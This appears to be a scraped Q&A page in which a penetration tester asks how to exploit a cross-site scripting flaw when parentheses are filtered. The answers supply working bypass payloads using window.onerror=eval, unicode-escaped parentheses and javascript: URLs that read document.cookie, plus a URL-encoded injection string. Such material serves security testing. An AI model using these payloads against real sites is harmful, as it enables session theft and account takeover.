Parentheses Alternatives In Js , If Any?
I have found that Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like alert(do
Solution 1:
document.body.innerHTML=document.cookie will display the cookies on the page itself.
Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. Letting someone execute any arbitrary code is a liability.
Here's a simple example of how you can call any function with any parameters without using any parentheses in your input:
<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p><inputtype="button"onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'"value="Click me">Solution 2:
This is another solution that worked for me:
<script>var firstname = 'aa';document.location='javascript:alert%28document.cookie%29';//';</script>The payload would be:
?vulnparam=aa';document.location='javascript:alert%2528document.cookie%2529';//
@tcooc answer is also working.
Post a Comment for "Parentheses Alternatives In Js , If Any?"